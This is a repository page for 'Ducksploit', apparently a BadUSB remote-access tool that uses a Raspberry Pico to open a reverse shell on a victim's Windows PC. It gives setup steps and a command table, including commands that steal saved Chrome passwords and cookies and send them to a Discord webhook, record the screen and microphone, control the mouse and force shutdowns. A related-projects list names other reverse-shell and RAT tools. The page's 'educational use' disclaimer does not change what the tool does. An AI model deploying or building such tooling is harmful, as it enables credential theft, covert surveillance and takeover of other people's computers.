DUCKSPLOIT - Windows Hacking FrameWork using Reverse Shell

Overview

banner

Ducksploit

Install Ducksploit

Hacker

setup raspberry pico
  1. Download https://github.com/DuckpvpTeam/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in PICO SETUP folder
  4. Plugg your raspberry pico on your PC with the BOOTSEL button picobootbutton
  5. Move CircuitPython.uf2 file in the E:\ usb port (port of your pico) now your raspberry pico gonna leave usb port and reconnec with CIRCUITPY name
  6. Erase all the content of your raspberry pico and copy 'copy' folder into him
  7. Write myip.txt and write your own IP
  8. Now your raspberry pico is full configured , unplugg your pico and done!
setup ducksploit commands
  1. Download https://github.com/canarddu38/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in SERVER folder
  4. If python is not installed, launch 'installpython.bat' or download at https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe
  5. Install python requirements using 'installrequirements.bat' script
  6. launch setup.bat ###MUST BE RUN AS ADMINISTRATOR###
  7. Ducksploit is now installed on your PC 😄
  8. Type 'ducksploit' in the cmd
  9. Config your ip using 'ipconfig' (your ip)
  10. Wait victim's connection using 'wait' command
  11. Have fun with ducksploit hacking commands (type help to get commands list)

Victim

Just plugg the raspberry pico in your pc (or hacker can do also) That will start automaticaly the client of the reverse shell

⚠️ Ducksploit is made for legal use or educational use ⚠️

Uninstall Ducksploit

  1. type 'ds uninstall' in cmd
  2. Done 😄

SUPPORT

Donate 👍 using Paypal

Commands

Launch

Command Usage Result
wait wait wait your victim's connection

Config

Command Usage Result
ipconfig ipconfig (your ipv4) config your ip

Account

Command Usage Result
register register reconfigure your account
accountinfo accountinfo view all your account's infos

Exploits

Command Usage Result
stealpwds stealpwds (discord webhook url) steal all saved chrome passwords of your victim and send them into a discord webhook
stealcookies stealcookies (discord webhook url) steal all saved chrome cookies of your victim and send them into a discord webhook
open open (applicationname.exe) open mensioned application
recordscreen recordscreen (time in second) record victim's screen durring amount of time
recordmicro recordmicro (time in second) record victim's micro durring amount of time

Mouse

Command Usage Result
mouseclick mouseclick [left, right, middle] make the victim click the mensionned button
mousemove mousemove (x) (y) move the victim's cursor by x and y pixels
mousescroll mousescroll (int between -1000 and 1000) make the user scroll by int pixels
locatemouse locatemouse get the victim's cursor current locations

Alert Window

Command Usage Result
msg msg [-file, -text] (title) (line1) (line2) create an alertbox and send it on the vitim's pc with a title and 2 lines (if -file set line1 to createfile command content)
createfile createfile (text) set the content of line1 of msg command

Troll

Command Usage Result
skull skull spam cmds with skull and crossbones

Mysc

Command Usage Result
uninstall uninstall uninstall ducksploit
update update update ducksploit
credits credits view ducksploit's credits
exit exit exit from the ducksploit treminal
help help getting the list of all commands
shutdown shutdown make the victim's pc shutdown
reboot reboot make the victim's pc reboot
closesession closesesion make the victim's session close
You might also like...
a socket mock framework - for all kinds of socket animals, web-clients included

mocket /mɔˈkɛt/ A socket mock framework for all kinds of socket animals, web-clients included - with gevent/asyncio/SSL support ...and then MicroPytho

A browser automation framework and ecosystem.
A browser automation framework and ecosystem.

Selenium Selenium is an umbrella project encapsulating a variety of tools and libraries enabling web browser automation. Selenium specifically provide

splinter - python test framework for web applications

splinter - python tool for testing web applications splinter is an open source tool for testing web applications using Python. It lets you automate br

Web testing library for Robot Framework

SeleniumLibrary Contents Introduction Keyword Documentation Installation Browser drivers Usage Extending SeleniumLibrary Community Versions History In

a socket mock framework - for all kinds of socket animals, web-clients included

mocket /mɔˈkɛt/ A socket mock framework for all kinds of socket animals, web-clients included - with gevent/asyncio/SSL support ...and then MicroPytho

A framework-agnostic library for testing ASGI web applications

async-asgi-testclient Async ASGI TestClient is a library for testing web applications that implements ASGI specification (version 2 and 3). The motiva

A Modular Penetration Testing Framework
A Modular Penetration Testing Framework

fsociety A Modular Penetration Testing Framework Install pip install fsociety Update pip install --upgrade fsociety Usage usage: fsociety [-h] [-i] [-

Parameterized testing with any Python test framework

Parameterized testing with any Python test framework Parameterized testing in Python sucks. parameterized fixes that. For everything. Parameterized te

The pytest framework makes it easy to write small tests, yet scales to support complex functional testing

The pytest framework makes it easy to write small tests, yet scales to support complex functional testing for applications and libraries. An example o

Owner
We're smart developers , and we work on Windows & android :+1: (DUCKSPLOIT is comming... :hourglass_flowing_sand: )
null
A pure Python script to easily get a reverse shell

easy-shell A pure Python script to easily get a reverse shell. How it works? After sending a request, it generates a payload with different commands a

Cristian Souza 48 Dec 12, 2022
fsociety Hacking Tools Pack – A Penetration Testing Framework

Fsociety Hacking Tools Pack A Penetration Testing Framework, you will have every script that a hacker needs. Works with Python 2. For a Python 3 versi

Manisso 8.2k Jan 3, 2023
d4rk Ghost is all in one hacking framework For red team Pentesting

d4rk ghost is all in one Hacking framework For red team Pentesting it contains all modules , information_gathering exploitation + vulnerability scanning + ddos attacks with 12 methods + proxy scraper and wordpress vulnerability scanning and more

d4rk sh4d0w 15 Dec 15, 2022
RAT-el is an open source penetration test tool that allows you to take control of a windows machine.

To prevent RATel from being detected by antivirus, please do not upload the payload to TOTAL VIRUS. Each month I will test myself if the payload gets detected by antivirus. So you’ll have a photo every month to prove RAtel’s discretion.

null 218 Dec 16, 2022
pywinauto is a set of python modules to automate the Microsoft Windows GUI

pywinauto is a set of python modules to automate the Microsoft Windows GUI. At its simplest it allows you to send mouse and keyboard actions to windows dialogs and controls, but it has support for more complex actions like getting text data.

null 3.8k Jan 6, 2023
Codeforces Test Parser for C/C++ & Python on Windows

Codeforces Test Parser for C/C++ & Python on Windows Installation Run pip instal

Minh Vu 2 Jan 5, 2022
Python program that uses pynput to simulate key presses. Probably only works on Windows.

AutoKey Python program that uses pynput to simulate key presses. Probably only works on Windows. Can be used for pretty much whatever you want except

null 2 Oct 28, 2022
Generic automation framework for acceptance testing and RPA

Robot Framework Introduction Installation Example Usage Documentation Support and contact Contributing License Introduction Robot Framework is a gener

Robot Framework 7.7k Jan 7, 2023
Sixpack is a language-agnostic a/b-testing framework

Sixpack Sixpack is a framework to enable A/B testing across multiple programming languages. It does this by exposing a simple API for client libraries

null 1.7k Dec 24, 2022
splinter - python test framework for web applications

splinter - python tool for testing web applications splinter is an open source tool for testing web applications using Python. It lets you automate br

Cobra Team 2.6k Dec 27, 2022